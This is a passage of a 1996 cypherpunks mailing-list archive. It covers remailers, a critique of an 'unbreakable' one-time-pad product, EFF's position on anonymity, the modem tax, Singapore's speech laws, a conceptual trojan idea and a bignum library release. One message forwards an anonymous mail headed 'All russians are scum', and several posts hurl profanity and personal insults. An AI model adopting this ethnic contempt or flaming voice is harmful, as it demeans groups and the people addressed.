Do the math: used 486 MB+CPU: $100
                    16MB RAM: $150
            case+powersupply: $50
                    100MB HD: $20
               HD Controller: $15
      Dual 16550 Serial Card: $15
              28800bps Modem: $150
                             ------
                              $500

And if you really want to run a remailer, I can sell you most of the above,
and I'll even throw in a 340MB IDE HD with Linux+remailers preinstalled!
(Yes, I'm serious.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Tue, 3 Sep 1996 02:14:01 +0800
To: James Seng <jseng@pobox.org.sg>
Subject: Re: Encourage Singapore To Come Out Of the Stone Age
In-Reply-To: <199609020913.TAA11331@jagumba.anu.edu.au>
Message-ID: <Pine.SUN.3.95.960902144238.16072E-100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Sep 1996, James Seng wrote:

> You dont go to jail for writing articles. You might be sue for deframation
> if you published something untrue (similar to your civil lawsuit i guess?)

	So what happens if somebody in Singapore publishes a list of 
	Singaporians who beat up Chinese immigrants  the previous week.
	
> and have to pay large sum of money to the person but you dont go to jail.

	If the person who publishes the list of Singaporians who beat up
	Chinese immigrants the previous week is not in jail for publishing
	that, then what is he in jail for?  The individual is publishing
	factual data, just data that the Singapore government has been
	trying very hard to keep out of the hands of the population of
	Singaporians in specific, and the world in general. 

> >a government that can keep the leader of an opposition political party
> >in jail for years just because he opposes them is pretty corrupt.
> I am not interested in politics so i didnt really know what is happening in
> that case. for that, i have no comment.

	IOW, you don't give a damm about freedom of speech -- which is
	what I suspected was the case all along.

	You're just one of those people who says pretty words, without
	meaning them.   

> Very true. So does the First Amendment said. Singapore does have such
> similar law as First Amendment which is slight "modified". You have freedom
> of speech as long as your comments does not endanger religious/racist
> harmony and national security. (I do not know the exact term..need a lawyer

	National security is a hole that makes a mockery of anything which
	allegedly protects freedom of speech.   

	The slight modification in Singapore's freedom of speech law means 
	that all speech is acceptable, so long as the writer first 
	self-censors, and secondly doesn't offend any jerks in Singapore,
	and thirdly doesn't offend any jerks in the neighbouring
	countries, and fourthly doesn't offend the current despot in
	Singapore.  << A statment which makes this message illegal to
	carry through the internet.  >>

	Still want to claim that Singapore practices freedom of speech?
	Or do you want me to start citing religious, political and
	serious literary works of merit that are prohibited under 
	Singapore's alleged freedom os speech statute, that bans any
	speech that might be controversial? 

        xan

        jonathon
        grafolog@netcom.com




	However, if you're tired of the Lesser of N evils, 
	Cthulu's export policy is that you can't escape 
	anyway, and your puny mortal lives will be absorbed 
	along with his morning coffee.  Your encryption 
	technology is futile against the Elder Gods, and the 
	arcane formulas in the Cyphernomicon of that mad 
	physicist Tim The Enchanter may summon spirits from 
	the vasty deep, but no secrets are safe from 
	Nyarla-S-Ahothep who knows all and sees all.
				Bill Stewart






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Tue, 3 Sep 1996 05:53:48 +0800
To: Alex Walker <survival@aa.net>
Subject: Pseudocrypto detector is going wild (was: Re: ALPHACIPHER - An unbreakable encryption program.)
In-Reply-To: <01bb94a6.44902540$8adc9dcc@survival>
Message-ID: <864tlgivwo.fsf@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


The following message is a courtesy copy of an article
that has been posted as well.

-----BEGIN PGP SIGNED MESSAGE-----


"Alex  Walker" <survival@aa.net> writes:

> The strongest encryption system available to the public will be available
> soon at:
> http://www.aa.net/cyber-survival-hq
> 
> ALPHACIPHER has been in the making for the past ten years, and has come
> into its own
> with the proliferation of Internet communications. 
> 
> A demo of this program along with a FAQ can be downloaded from
> cyber-survival-hq 1SEP.  This is an unbreakable program...

Here we go again.

I just got done surfing the site above. Assuming that all statements
regarding the unbreakability of the cipher, the lack of applicability
of the question regarding its key size, etc., are at least based on
some degree of truth, "alphacipher" is a one-time pad. Given that
anything else is not really "unbreakable," if it's not a one-time pad,
the claims about its security are bogus.

But let's assume that it is.

In exchange for the great security of one-time pads, users of such
must be willing to tolerate their drawbacks, and there are some
significant ones.

    1 The unbreakability of the one-time pad is completely thrown out
      the window if the key is not _truly_ random. A software based
      pseudorandom number generator simply won't cut it; even the best
      PRNGs will have some degree of predicability. It is possible
      that these random keys are truly random (given point 2, below),
      but I find this to be unlikely, since the overview boasts that
      the keys are generated by a "proprietary random key set
      generator." Now, we're getting into *another* issue, and that is
      of the wisdom (or, more correctly, lack thereof) in using
      proprietary algorithms. Not only does this fail to ensure any
      higher level of security when compared to that of a well-known
      algorithm, but actually increases the liklihood that an error
      has gone undiscovered, since fewer experts have had the
      opportunity scrutinize it.

    2 The pool (or "pad") of random bits from which the keys are
      generated must be distributed ahead of time. Given this
      requirement, the "random bit pad" must be distributed with the
      program itself. In fact, the two "comm key disks" seem to be
      just this. A third "vault key" disk, used for local online
      storage, seems to be another random bit pad.

    3 Keys must stay perfectly in sync. A single bit-shift either way,
      and you're hosed. Given that there is a finite number of bits in
      the pad (as there must be, since they need to be precalculated
      and distributed with the program), that they all must stay
      perfectly in sync, and that the program appears to be marketed
      for widespread (albeit low-bandwidth) use, there must be some
      mechanism by which the encrypting program can tell the
      decrypting program how far along in the bit pad to advance
      before using them for the key. Otherwise, if I send a message to
      Alice, then I send one to Bob, Bob is going to use a different
      starting point in the pad for the key assembly than I did to
      create the message, unless he also received a copy of what I
      sent Alice, and every person before that. Giving an indication
      of the byte offset to use for decryption seems the only workable
      solution to this problem.

    4 The keysize must be exactly equal to the size of the plaintext
      to be encrypted.

    5 Bits from the pad that are used for key generation must never
      be used again. Ever. Since there are only two "comm key" disks,
      which must be the same for every distribution, you can get
      probably get somewhere between two and 10 million "random" bits
      on the disks, depending on whether you're using compression, and
      if so, what compression algorithm you're using. Let's assume
      that you've got 10 million bits on there. Since the encryption
      of one bit exhausts one bit from the pad, I can exhaust the
      entire supply by sending someone a 10MB mail message. Or two
      five MB mail messages, or 10 one MB messages. In any case, it
      doesn't take long. And as soon as I'm out, if I start over again
      at the beginning, I'm blowing the security, since I'm reusing
      keys.

    6 Anyone with access to the key pad can decrypt a message sent to
      anyone else, as long as they know the proper bit offset. Because
      of what I've described in item 3, it seems likely that I'll know
      that ahead of time. Hence, the security of the "alphacipher"
      encrypted messages decreases with each additional user that
      "alphacipher" gains.

So, it seems to me that I can break *any* message that anyone encrypts
with "alphacipher" by getting a copy of the comm key disks, figure out
how "alphacipher" calculates where in the pad to begin generating the
key, and apply the appropriate key to the encrypted message. Perhaps a
bit of additional obfuscation is occuring somewhere in there, but the
basic premise is that because of what it's trying to do, this has to
be a very poor implementation of a one-time pad, and therefore
completely vulnerable to passive attack.

(This is using the "comm key"; the "vault key" has much more
potential, since it can be unique for every user, but it can still be
exhausted very quickly, and therefore have a successful cryptanalysis
made of that data, using other means: a larger amount of data will be
necessary to reconstruct the bit pad before any messages can be
broken, but once again, after it's constructed, anything encrypted
using that bit pad can be broken. And, since it seems unlikely that
we're dealing with REAL random numbers here, this probably isn't
nearly as tough as it ought to be.)

I have absolutely no knowledge of "alphacipher" beyond what is
contained in the original posting I saw on alt.security which pointed
me to the web page (http://www.aa.net/cyber-survival-hq/Alpha1.htm)
but it seems that I've made a decent (albeit trivial) analysis of its
weakness, and at least given serious raise to your ability to make
such claims about its security.

If I'm wrong, please show me how so. If not, please do us all a favor
and quit with the advertising claims.

(All I need now is someone to threaten to sue me, and I'll maintain my
record of having lawsuit threats made against me every time I
criticize something that claims to be "strong crypto.")

- -- 
C Matthew Curtin                MEGASOFT, INC                Chief Scientist
I speak only for myself.  Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin@research.megasoft.com http://research.megasoft.com/people/cmcurtin/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Have you encrypted your data today?

iQEVAwUBMisu2X6R34u/f3zNAQFKSgf/T/cB0X33sDGHoiqVfbXZcW9VEFBcbtVA
bTjFLEKrh89pEeZ8VR7FsZRkbC5C7ceuy1aoTAK+RLdaOBZN8AkOTWXvo139gVW/
9P+gv8eitZlhWzSnXfpURp45m737wjRfgsP7drgWZr3AdGCu3XOipIyy3tcJrcGY
fPBpBZXvAfdmxX5B3CiRgLFOdhVxzhyO7Cv019ybRTCYjZncPEyyXIYMzrCJkyBi
QbZzcsvgwTq+vD0Cw9/REVqxH6Av3tzJacLLgo33hO1cvti9910FcTSCIdnmR+E+
Pse2Gm0nx8Ochcfw2ZmEVtJI7hXkLbOXMq7i/i++jtMSeMVrIsfXUg==
=ZbJf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 3 Sep 1996 15:35:14 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <Pine.SUN.3.94.960902165133.26405B-100000@polaris>
Message-ID: <199609022209.PAA17638@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Also questionably relevant for an issue like this (more relevant perhaps 
to intellectual property issues, etc.)  The political axis most relevant 
here is civil libertarian v. authoritarian.  I don't think you'll find 
any authoritarians on the EFF board or staff.

Black Unicorn typed:
> 
> On Mon, 2 Sep 1996, Esther Dyson wrote:
> 
> > At least you don't accuse me of being a Communist.
> 
> Without commenting on the question of intelligence agencies, far left and
> far right on this issue are fairly non-distinct.
> 
> > Esther Dyson				Always make new mistakes!
> > EDventure Holdings
> > <edyson@edventure.com> 
> 
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li
> 
> 



--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 3 Sep 1996 17:02:42 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Modem tax again?
Message-ID: <199609022230.PAA15730@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes, isn't it interesting how they managed to turn this issue into their desire to "end a subsidy," when you know they would be terrified of REALLY ending the various telephone subsidies that are operating.  For years, businesses have paid more for telephone service than residences.  While this might have made sense in the era before digital switches, it does no longer.

Also,  the claim that "Internet users are overtaxing phone networks and ought to pay more for monthly service" isn't believable.  In my experience, the time between 9:30 pm and 11:00 pm is the only time which usually produces busy signals to my ISP, a time which is when, traditionally, telephone traffic is quite light as compared to peak hours.  I'd be happy to compare the "usage-factor versus time" of ISP's versus regular voice calls if I had the numbers, but I suspect that calls to local ISP's complement voice traffic rather than add to its peaks.  



At 01:40 PM 9/2/96 EDT, E. ALLEN SMITH wrote:
>	As I recall, the alleged "subsidy" consists of lack of payments so
>rural areas can have subsidized phone service - thus making their costs borne
>by everyone else.
>	-Allen
>
>>     _________________________________________________________________
>>   Avis
>>     _________________________________________________________________
>>                INTERNET IS HURTING PHONE NETWORKS, STUDY SAYS
>>   __________________________________________________________________________
>>      Copyright &copy 1996 Nando.net
>>      Copyright &copy 1996 San Francisco Examiner
>      
>>   SAN FRANCISCO (Aug 27, 1996 3:11 p.m. EDT) -- Hoping to reduce or end
>>   a subsidy that has kept down the cost of on-line service, local phone
>>   companies here have presented the Federal Communications Commission
>>   with studies arguing that Internet users are overtaxing phone networks
>>   and ought to pay more for monthly service.
>   
>>   The studies, one of which was published on the Internet, argue that a
>>   13-year-old subsidy lets Internet service providers (ISPs) pay a
>>   fraction of what a long distance company pays to get a phone line,
>>   even though Internet calls may use more phone system capacity than
>>   voice traffic.
>   
>[...]
>
>>   For their part, ISPs are alarmed at the remote possibility that the
>>   FCC might let phone companies raise their monthly costs from the
>>   current monthly average of $30 to anything approaching the $600 that
>>   some long distance carriers pay for a phone line.
>   
>>   "If we had to pay anything like long distance access charges, it would
>>   put all the ISPs out of business," said Ronald Plesser, the
>>   Washington, D.C., attorney who represents the Commercial Internet
>>   Exchange, an ISP trade group.
>   
>>   FCC staff attorney Kevin Werbach said the subsidy began in 1983, when
>>   the five-member federal commission created a special rate to encourage
>>   the growth of on-line services, voicemail companies and other emerging
>>   industries that offered enhanced electronic services over phone lines.
>   
>>   In 1987, the FCC considered ending the subsidy but backed down after
>>   public protest over what came to be characterized as the "modem tax."
>>   Given the growth in on-line usage, ISPs assume any talk of ending the
>>   subsidy would create a bigger backlash today.
>   
>>   "There are a minimum of 20 million and perhaps as many as 40 million
>>   on-line and Internet users and many of them are registered voters,"
>>   said William Schrader, president of PSI Net, an ISP in Herndon, Va.
>   
>>   Schrader said when he visited several FCC members recently, he
>>   suggested that many of those users would be happy to send a letter of
>>   protest to FCC Chairman Reed Hundt.
>   
>[...]
>
>>    Copyright &copy 1996 Nando.net
>
>
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Tue, 3 Sep 1996 16:01:40 +0800
To: cypherpunks@toad.com
Subject: Passive Trojan (was:Re: HAZ-MAT virus)
Message-ID: <Pine.3.89.9609021532.A29664-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




This has been done in the past using several vairants (but not in a image 
program).

The key to the success is that the application in question has to be 
compromised to respond to these codes, either by design or by hacking. 
Either way the individual responsible must modify the execution 
mechanism, not just the data itself.

Let's see -current examples of computing items with this kind of a 
"feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the 
list keeps growing.

On Mon, 2 Sep 1996, Jason Wong wrote:

> 
> Actually , THINK about it, it does makes a interesting idea for a trojan
> horse doesn't it ? I mean, just get a solid graphic program, insert codes
> into it so that when certain conditions, i.e. a particular gif or jpg file
> is view, print, etc, the trojan activates !! 
> ___________________________________________________________________________
> 
> Jason Wong (CNE, MCP)                                     Jason@MCSB.COM.SG
> Network Engineer
> MCSB Systems Pte Ltd
> ___________________________________________________________________________
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 3 Sep 1996 16:27:15 +0800
To: cypherpunks@toad.com
Subject: Kill all "libertarians"
In-Reply-To: <199609021626.SAA11752@basement.replay.com>
Message-ID: <kV9mTD53w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From nobody@REPLAY.COM  Mon Sep  2 12:26:36 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Mon, 02 Sep 96 15:42:57 EDT
	for dlv
Received: from basement.replay.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA18013 for dlv@bwalk.dm.com; Mon, 2 Sep 96 12:26:36 -0400
Received: (from replay@localhost) by basement.replay.com (8.7.5/8.7.3) id SAA11752 for dlv@bwalk.dm.com; Mon, 2 Sep 1996 18:26:28 +0200 (MET DST)
Date: Mon, 2 Sep 1996 18:26:28 +0200 (MET DST)
Message-Id: <199609021626.SAA11752@basement.replay.com>
To: dlv@bwalk.dm.com
From: nobody@REPLAY.COM (Anonymous)
Organization: Replay and Company UnLimited
Xcomm: Replay may or may not approve of the content of this posting
Xcomm: Report misuse of this automated service to <abuse@REPLAY.COM>
Subject: All russians are scum. No exceptions.

Return-Path: <cypherpunks-errors@toad.com>
To: cypherpunks@toad.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Comments: Dole/Kemp '96!
Date: Mon, 02 Sep 96 01:19:37 EDT
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com

jonathon <grafolog@netcom.com> writes:

> On Sun, 1 Sep 1996, James A. Donald wrote:
>
> > > I agree with what you are saying but not all polititions are that bad.
> > > You make it sound as if their are no politisions are for freedom of the
> > > net.
> > So who is the exception?
>
> 	Harry Browne  Libertarian Party Candidate.

Harry Browne is a fucking statist.  All politicians are scum.  No exceptions.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 3 Sep 1996 18:45:43 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <Pine.SUN.3.94.960902174944.29644A-100000@polaris>
Message-ID: <199609022254.PAA09742@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



ah, the quasi-yearly ranting on EFF has started up. what a great
opportunity for drop-down-drag-dead flamewar.

Black Unicorn: I resent your holier-than-thou moral posturing
over EFF, and am going to attack it as representative of other
criticism I have seen of EFF. 

EFF is an organization that is professional and has
worked toward improving cyberspace. it is easy for someone
such as yourself to criticize such an organization anonymously,
but what is the justification of your criticism? to me someone
who has tried and failed, yet is still trying, is better than 
someone who has never tried. what *constructive* 
alternative to EFF do you propose? if you have none, please shut up.
I am tired of people announcing loudly to the world, "well if EFF
doesn't support [insert my personal jihad here], then they're 
a bunch of losers who don't deserve anyone's money".

>Why am I any more mistaken  for pointing out that a single influential
>member of EFF's staff or board is anti-anonymity and yet remains with the
>organization than you are for pointing out that a single influential
>member who happened to be anti-anonymity has left?

get a clue. an organization does not have to officially espouse what
its members espouse. what an organization espouses should be carefully
crafted. if all members feel strongly about an issue, yet all also
feel that it should not be part of the official plank, then that may be
a wise decision to leave it out. what an organization does *not* do is as 
important as what it does do. EFF is learning, by trial and error and the
hard way, to "choose battles wisely".

I would love to see more info about EFF's new direction. but one
can ask for such clarification without a rabid style such as your own.

>In so far as an organization is much defined by those involved, I think it
>entirely right to wonder aloud about the personal motives of the staff and
>board.  I think this PARTICULARLY prudent given EFF's reputation and prior
>conduct.

blah, blah, blah. why should EFF give the slightest damn what you think
of them? if you were at the helm of a competing organization that
was doing superior work, or a privacy lobbyist with a track record,
maybe they should listen. as it stands I think they are giving you
far more respect than you deserve by even responding to your
various scurrilous insinuations.

why do I see so much of this in cyberspace and on the cpunks list:
gripes, gripes, gripes by people who have no record themselves of
doing anything constructive...? the difficulty of doing something
constructive is proven by the failures, it is not necessarily 
evidence of incompetence or conspiracies. perhaps you, Unicorn,
feel the cpunks have a greater track record than EFF? 

>I would be most happy to be proven wrong and see EFF suddenly, in a burst
>of impressive moral fiber, speak out publically and take some political
>action to assure anonymous communication.

I would like you to explain why you feel the need to criticize EFF
for not necessarily sharing your own agenda.

>Well, let's have a clear official position issued then to end all dispute.

again, you fail to grasp: EFF may justifiably not want to engage in that
fight. it might be a wise decision.  who are you to dictate EFF's
agenda? why are you picking a fight with someone who might be the
best ally?

>I'm hardly going to support an organization that proports to be
>pro-internet freedom and yet has no official position on anonyminity. 

perhaps you would be more influential if you learned to spell what
you are advocating. (hee, hee)

> Of
>course you should expect people to wonder about EFF when you have no
> official position and yet some staff and board members seem to have a
>statist bent.

and you, like many other cypherpunks and cyberspace weasels, 
have a whine-and-shriek-from-the-shadows bent.

BTW, I reject the claim by some here (e.g. TCM) that the supposed change in
direction at EFF implies that such an organization is inherently
top-heavy and will fail in comparison to cypherpunk guerilla-style
"technology deployment."  it seems to me both the cpunk philosophy
and the EFF philosophy can coexist, and I really get tired of people
who can't think past a "only one can exist" worldview.

I also don't understand the anonymity fight by cpunks. it's the
wrong battle imho. ask any remailer operators how their services
are panning out. they will complain of the incessant spam and
increasing litigious pressure. I don't see any technological 
solutions to these problems. if there were, they'd have been 
invented now. 

let's face it, anonymity is a pain in the ass
to support. maybe there are other goals that are more crucial
that lie at the heart of anonymity. what cpunks are really
seaking is  "assurance of freedom from retribution". when the
problem is phrased more openly like that, other solutions become
possible and worth consideration. anonymity is only one such
way to achieve this goal. I for one would like to see more
experimentation with reputation systems. "aw gee, nobody knows what
one would look like". well, that's the point. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Tue, 3 Sep 1996 18:14:42 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <Pine.SUN.3.94.960902174944.29644A-100000@polaris>
Message-ID: <199609022255.PAA19109@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


(You may need to manually repost this to c'punks. NB: I did not 
authorize redistribution of my email to you to c'punks in the first 
place. But since it's there now...

Black Unicorn typed:
> 
> Why am I any more mistaken  for pointing out that a single influential
> member of EFF's staff or board is anti-anonymity and yet remains with the
> organization than you are for pointing out that a single influential
> member who happened to be anti-anonymity has left?

I didn't say you were more mistaken than anyone or anything else. I'm not 
aware of a mistakenometer with which to make such a measurement.

I pointed out your assumption that "It is clear that the personal 
beliefs of those involved in EFF are those of compromise, present day 
politics, and a general lack of moral fiber" is not in fact "clear" at 
all, because you have insuffient information to make such a statement.
You don't even have to belive my remark that others in EFF have very 
pro-anonymity positions - you categorization of EFF is still logically 
bankrupt, because you don't have enough facts to make it.

> If my position, as you represent, is misguided, surely your point about
> Mr. Johnson is equally so.  If the board is almost 100% pro-anonymity,
> where's the official position?

The board is not almost 100% pro-anonymity.  There are widely differing 
opinions on the topic, and many board members have not directly wrestled 
with this issue before at all. I've seen some opinions shift in the space 
of a few messages.  This should clearly illustrate why there is no
official position yet. Some EFFers are not only not in agreement with 
eachother on this, but aren't sure where they stand at all.  This is the 
first time the issue has come up for the board as a whole since early 
1995, and the board's composition is very different now.  This is the 
same process EFF goes through every time an issue comes up on which we 
have no position. Sometimes a position is agreed upon, and there we are, 
but sometimes no position is taken, as is still the case with 
intellectual property. In cases like that, we look at what happens on a 
case by case basis, rather than categorically.  (That is to say, even on 
stuff where we have no position, if something happens that harms the 
public interest we do not feel any obligation not to act simply because 
we lack a position on the meta-issue.)

It will take some time to formuate a position on it. Personally, I am 
confident that if EFF takes a position on online anonymity, it will be 
the positive stance you would expect from us.  It is also likely to be 
tempered with a discussion of responsibility issues, just like every 
other EFF position. This is not a "sellout" or a "compromise" just a 
recognization of fact: anonymity does have costs associated with it, such 
as the ability to defame without the defamed party having much recourse 
other than contradiction. Such costs should be stated openly, not lied 
about or ignored.  If EFF or other organizations pretend there are no 
costs or belittle concerns about costs, we undermine everything we are 
working for - we undermine the public interest and individual liberty.

> In so far as an organization is much defined by those involved, I think it
> entirely right to wonder aloud about the personal motives of the staff and
> board.  I think this PARTICULARLY prudent given EFF's reputation and prior
> conduct.

That's fine. I do think you should wonder. But wondering and making unfounded 
accusations are different things.  It's one thing to say, "I wonder if Black 
Unicorn has good moral fiber whatever that is, and in fact I suspect he 
doesn't" (hypothetically, mind you), but it's quite another to say "Black 
Unicorn has no moral fiber!" (whatever moral fiber might be.)

> 
> I would be most happy to be proven wrong and see EFF suddenly, in a burst
> of impressive moral fiber, speak out publically and take some political
> action to assure anonymous communication.

Don't be surprised if it happens.  Also don't be surprised if it doesn't 
happen.  In EFF's 6+ years, no clear consensus on anonymity has yet 
evolved within any version of EFF's board and staff.  DO be surprised if 
you see EFF take an official position against anonymity. If that happens, 
I'll start looking for another job.  I'm confident it won't happen, or 
I'd probably already be looking for another job.

> > 
> > Things simply are not as black and white as they might seem.
> >
> 
> Well, let's have a clear official position issued then to end all dispute.
>
I'd like to see that too, but it may be a while in comming. 

> What is EFF doing if not supporting anonyminity?

That's a very good question.  EFF has, the entire time I've been with it, 
and before that the entire time I was observing it (that is, ~1992 to 
present) been quite supportive of anonymity, in ways that range from 
relying on facets of the NAACP case in our own CDA challenge, to 
defending online anonymity when being interviewed by the press, to 
providing publicly available materials (e.g. at 
http://www.eff.org/pub/Privacy/Anonymity) on anonymity including remailer 
lists and FAQs, to having a link on our "other interesting sites" page to 
the WWW remailer gateway, to permitting anonymous posts to all of our 
public mailing lists.  I can't think of any EFF statement against anonymity,
and even Esther's personal statement is not against anonymity, just 
advising caution and noting that there are many unresolved concerns in 
this area.
 
> I'm hardly going to support an organization that proports to be
> pro-internet freedom and yet has no official position on anonyminity.  Of

It's certainly your right to not support us.  I'm sad that you won't, but 
it is beyond anything I can do anything about. Positions on issues take 
time to evolve.  

> course you should expect people to wonder about EFF when you have no
> official position and yet some staff and board members seem to have a
> statist
> bent.

Again, I think you're making unfounded assumptions. The fact that Dyson 
has questions about the balance of the value and cost of online anonymity 
does not indicate a "statist bent". Hell, *I* have questions about that 
balance. For myself, I've found adequate answers, and have come to the 
conclusion that even if anonymity on the net were abused 1000x more than 
it is now, it would still be better to have anonymity than to not have it.
But I have to let other people come to that conclusion themselves, with 
my help when appropriate. I can't find any value in demonizing others 
who've not come to that conclusion, even if if I do find value in severely 
criticizing people who have taken a completely anti-anonymity position, 
which Dyson has not. Dorothy Denning, different story.  I will happily 
criticize her positions into the ground, because they are what they are.
EFF's position does not exist yet, and the only not completely 
pro-anonymity individual opinions I've seen out of the board are not 
anti-anonymity, they're just full of questions. I can't slam people for 
having questions.

--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 3 Sep 1996 07:16:20 +0800
To: adam@homeport.org
Subject: Re: Whistleblowing on the Internet
Message-ID: <01I90C52IMZ49JDDSI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	There's also the point that some whistleblowing isn't exactly
what some political groups would want to occur. For instance, opponents
to unions such as myself aren't going to want a whistleblower to be able
conveniently to report their exclusion from a job due to union membership.
	-Allen

From:	IN%"adam@homeport.org"  "Adam Shostack" 27-AUG-1996 02:41:17.66
To:	IN%"geoff@digidem.com"
CC:	IN%"cypherpunks@toad.com"
Subj:	RE: Whistleblowing on the Internet

Geoffrey Gussis wrote:

| Overall, I am quite surprised that there isn't a whistleblowing
| clearinghouse on the Internet; a site sponsored by a non-profit that lists
| email addresses and secure forms for sending anonymized email to those
| areas of the public and private sector that deal with whistleblowing.  As
| the Internet is a great medium for information dissemination, and offers
| significant privacy advantages, I really expected to find much more.

	Such a clearinghouse is what we call a fat target; something
likely to attract attention since wiretapping it could be very useful
to an organization that worried about having a whistleblower.

	As such, the correct attitude towords whistleblowing is to use
an anonymous remailer, and send to interested parties.  That's how the
AT&T deal that sunk the des phones and made clipper a household word
was publicized; a member of the list(?) interested party sent a
number of interesting documents through remailers to cypherpunks.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Tue, 3 Sep 1996 15:49:18 +0800
To: linux-announce@stc06.ctd.ornl.gov
Subject: LInteger Version 0.1: A C++ MPILIB
Message-ID: <199609022311.QAA01347@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

LInteger is a C++ library designed to allow programmers to create and
perform arithmetic on objects representing nearly arbitrary precision
integers.  Thanks to C++'s support for operator overloading, the use of the
large integers in this library should be nearly as easy as the use of
regular int's. In fact, much code which performs arithmetic on regular
int's can be converted to code to perform the same arithmetic on arbitrary
precision integers merely by substituting "LInteger" for "int". 

This library is free for both commercial and non-commercial use. (See the
COPYRIGHT notice included in the source distribution for exact details.)

The current version of this library is only implemented for i386+
processors, and will, probably, only compile unhacked under gcc.
Additionally, it has only been tested on the Linux operating system, though
I am fairly confident that it will compile, unhacked, under the OS/2 and
Windows versions of gcc. (Please let me know if you get it to work!)

The basic multiprecision methods are implemented in i386+ assembly language
for high speed. Multiplication is performed recursively resulting in 
O(lg 3) performance. Modular multiplication can be performed via Montgomery
representations for a noticeable performance gain when a large number of
these modular multiplications are performed.  

HTML documentaion for all public methods is included.

There is currently no pseudo-random or probable prime number generation
included. These are my highest priorities for the next release 
which will, hopefully, come out shortly after I read Rabin-Miller. :) 

A link to the latest version of this library can be found at

    http://www.interchg.ubc.ca/janke/linteger/index.html 

Once you have the file linteger-v0.1.tar.gz, uncompress and untar it with
tar -zxvf linteger-v0.1.tar.gz. Next, cd to the newly created directory
linteger-v0.1 and read the file README for details on how to proceed. 

The message digests for linteger-v0.1.tar.gz are

MD5:    B518B338D59A8376095B9CAD74EA2E16
SHA:    445D8D1555DC18AB0DF47B9B0381F0B07D4CB644
HAVAL:  53774BA2BF60116DF9F0F476913252188DFD9D3828D19B6795BC14C19EFA7FEE

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAwUBMitSJR6H/su8/YEZAQH3lwQAsBpNY0rEW1U5vq5hkxdnqxgk1ZZtSV3K
5gTlYu7Z3OAqsqC62Qi7LlkI2dzhrNWYr/G+OXdFfCaHfBcNlePgHsj6xF4oCy3U
iGy9yiCxP7Xs4xb8CjHYkW7S/HfVwyiY2AMxGJ/YfFzvi1MJTIT2A8z4Par5qwWe
XuG7XztGzAI=
=wq2q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 3 Sep 1996 12:31:14 +0800
To: cypherpunks@toad.com
Subject: Any cypherpunk solutions to this problem?
Message-ID: <01I90CQSB7289JDDSI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	To the degree that he's correct, how can such problems be solved
while increasing privacy, security, etcetera? What sort of decentralized
